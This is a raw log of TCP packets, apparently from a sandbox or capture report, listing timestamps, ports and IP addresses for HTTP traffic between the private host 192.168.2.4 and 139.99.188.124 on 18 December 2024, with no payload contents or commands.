                                                                              Dec 18, 2024 21:00:29.990183115 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.991338015 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.991765022 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.991852999 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.992603064 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.992615938 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.994190931 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.994210005 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.994272947 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.994272947 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.995779037 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.995793104 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.997385979 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.998233080 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.998888969 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.999641895 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.999654055 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.999818087 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.000751972 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.001615047 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.001627922 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.001795053 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.003196955 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.003209114 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.003307104 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.004844904 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.004863977 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.004925966 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.006575108 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.006589890 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.006644964 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.008022070 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.008035898 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.008091927 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.009805918 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.009818077 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.009881973 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.011363983 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.011394978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.011454105 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.013207912 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.013221979 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.013286114 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.014959097 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.014971972 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.015053988 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.016724110 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.016737938 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.016747952 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.016813040 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.016813040 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.018569946 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.018583059 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.018675089 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.020311117 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.020324945 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.020382881 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.022114992 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.022126913 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.022197008 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.023866892 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.023880959 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.023905039 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.023953915 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.025638103 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.025651932 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.025727034 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.027383089 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.027395010 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.027502060 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.029177904 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.029191971 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.029203892 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.029295921 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.030970097 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.030983925 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.031111002 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.032835960 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.032850027 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.033086061 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.034542084 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.034562111 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.034642935 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.036313057 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.036329031 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.036408901 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.038120031 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.038134098 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.038144112 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.038216114 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.039865971 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.039885044 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.039947033 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.041717052 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.041731119 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.041799068 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.043600082 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.043612957 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.043667078 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.045217991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.045229912 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.045242071 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.045330048 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.045330048 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.047008991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.047020912 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.047091007 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.048851967 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.048862934 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.048974037 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.050563097 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.050580978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.050678968 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.052470922 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.052483082 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.052618027 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.054121017 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.054133892 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.054152012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.054195881 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.055942059 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.055955887 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.056037903 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.057833910 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.057847977 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.057893991 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.059520960 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.059535027 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.059642076 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.061290026 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.061311007 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.061321974 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.061335087 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.061377048 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.063060045 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.063074112 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.063806057 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.064843893 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.064857960 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.065319061 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.066762924 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.066776991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.066874981 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.068423986 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.068438053 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.068531036 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.070178032 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.073724985 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.073745012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.073862076 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.075437069 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.075488091 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.179444075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.179464102 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.181348085 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.181385040 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.181404114 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.181478024 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.183176041 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.183188915 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.183228970 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.183240891 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.183275938 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.183275938 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.185034037 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.185046911 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.185129881 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.186614037 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.186625957 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.186676025 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.188147068 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.188159943 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.188251972 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.190929890 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.191534996 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.191848040 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.192394972 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.192408085 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.192440033 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.195384026 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.195399046 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.195446968 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.195837975 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.195852041 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.197230101 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.197271109 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.197293043 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.197376013 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.199390888 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.199412107 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.199805021 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.200476885 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.200494051 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.200566053 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.201961040 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.201975107 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.202081919 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.203857899 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.203872919 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.204062939 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.206295967 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.206635952 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.206650972 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.206712008 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.207354069 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.207369089 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.207801104 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.209141016 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.209157944 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.209167004 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.209223986 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.210917950 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.210932970 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.211049080 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.212800980 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.212816000 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.212876081 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.215415001 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.215430021 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.215482950 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.216268063 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.216289043 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.216299057 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.216360092 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.216360092 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.218276024 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.218291044 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.218302011 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.218513966 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.219832897 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.219849110 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.219959974 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.221643925 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.221657991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.221712112 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.223380089 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.223392963 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.223402977 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.223452091 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.223452091 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.226248026 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.226264000 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.226350069 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.227082968 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.227102041 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.227336884 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.228724003 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.228734970 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.228843927 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.230581045 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.230592012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.230602026 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.230637074 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.232413054 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.232424021 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.232542038 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.234010935 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.234065056 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.234082937 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.235832930 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.235845089 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.236613989 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.237592936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.237605095 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.237667084 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.239367962 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.239381075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.239389896 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.239439011 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.239478111 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.241216898 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.241228104 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.241365910 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.243016005 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.243029118 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.243112087 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.244726896 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.244739056 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.244852066 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.246682882 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.246695042 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.246704102 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.246756077 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.248306990 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.248317003 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.248348951 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.250193119 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.250202894 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.250282049 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.251918077 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.251929998 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.251996040 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.255449057 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.255466938 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.255850077 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.255969048 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.255989075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.256000996 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.256021976 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.256057024 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.257210970 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.257222891 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.257278919 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.259048939 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.259061098 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.259226084 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.260790110 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.260802984 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.260893106 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.262614965 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.262626886 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.262671947 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.264359951 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.264379978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.264503002 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:31.261169910 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:31.667083025 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:33.405770063 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:33.525631905 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:33.525726080 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:33.526112080 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:33.645804882 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.038698912 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.039026976 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.039045095 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.039099932 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.041174889 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.041194916 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.041250944 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.043263912 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.043282986 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.043308020 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.045521975 CET8049753139.99.188.124192.168.2.4
